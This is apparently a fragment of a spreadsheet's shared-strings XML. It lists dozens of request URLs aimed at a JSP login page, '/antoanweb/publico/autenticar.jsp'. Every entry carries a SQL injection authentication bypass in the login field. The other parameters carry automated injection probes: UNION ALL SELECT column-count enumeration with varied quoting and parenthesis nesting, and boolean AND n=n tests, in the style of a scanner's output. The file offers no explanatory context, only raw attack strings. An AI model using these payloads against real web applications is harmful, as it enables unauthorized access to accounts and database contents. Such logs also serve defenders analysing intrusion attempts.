    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734,7734--and((("hsqn"="hsqn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136,9136--and((("lgxf"="lgxf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419,2419--and"ydcr"="ydcr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936--and"neyk"="neyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426--and"twab"="twab&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301,6301--and"qngz"="qngz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854--and"vrxp"="vrxp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465--and"uknf"="uknf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614,1614--and"silz"="silz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822--and"ryec"="ryec&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861--and"uqec"="uqec&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170,2170--and"yupq"="yupq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620,4620--and("yeuy"like"yeuy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263,7263--and("lmfj"like"lmfj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330--and("nqex"like"nqex&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949,7949--and("kcul"like"kcul&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305,2305--and("xdla"like"xdla&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740,7740--and("xhgj"like"xhgj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054,4054--and("pgjn"like"pgjn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296,4296--and("owwf"like"owwf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515--and("msel"like"msel&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359,4359--and("lcif"like"lcif&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094--and(("olbj"like"olbj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094,4094--and(("ilhg"like"ilhg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913,2913--and(("hniz"like"hniz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695,9695--and(("lnja"like"lnja&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331,8331--and(("neef"like"neef&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128--and(("gvxc"like"gvxc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643,6643--and(("gstj"like"gstj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821,4821--and(("ovdr"like"ovdr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953,7953--and(("orbl"like"orbl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442--and(("rvnv"like"rvnv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342,342--and((("gejj"like"gejj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296--and((("vzxi"like"vzxi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955,2955--and((("hoip"like"hoip&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657,8657--and((("dpjl"like"dpjl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525,3525--and((("wjwz"like"wjwz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306--and((("axqp"like"axqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896--and((("vfgj"like"vfgj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273,273--and((("ivcu"like"ivcu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864,7864--and((("phvs"like"phvs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295,7295--and((("fnst"like"fnst&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972,6972--and"ellw"like"ellw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327,3327--and"jvpk"like"jvpk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615,7615--and"lelg"like"lelg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298,7298--and"znul"like"znul&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003,9003--and"batf"like"batf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163,5163--and"vyhm"like"vyhm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784,4784--and"rpmo"like"rpmo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304,6304--and"ixxx"like"ixxx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567--and"nxuk"like"nxuk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683,7683--and"vhhs"like"vhhs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=2909</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar(")('"('()</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and7082=1885</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and144=144</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and7930=5631</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8170=9825</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and144=144</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5011=3443</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and4950=8577</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and144=144</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8369=8002</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5188=4990</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and144=144</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7763=5024</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and7670=2456and(3660=3660</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and144=144and(3034=3034</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and2573=3099and(2324=2324</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and3416=9095and((4500=4500</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and144=144and((5209=5209</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and2855=5668and((7518=7518</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and432=4663and(((5313=5313</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and144=144and(((2151=2151</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and653=9190and(((945=945</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand6166=3035</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand144=144</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand9208=1404</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and2134=7726and('sdct'='sdct</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and144=144and('bjul'='bjul</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and6142=8876and('hsiq'='hsiq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and5255=9887and(('uypq'='uypq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and144=144and(('jskh'='jskh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and8949=9628and(('vjet'='vjet</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and8203=269and((('xfyq'='xfyq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and144=144and((('mile'='mile</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and4508=3476and((('rukg'='rukg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3162=6856and'hcnq'='hcnq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and144=144and'skxv'='skxv</t>
  </si>
  <si>
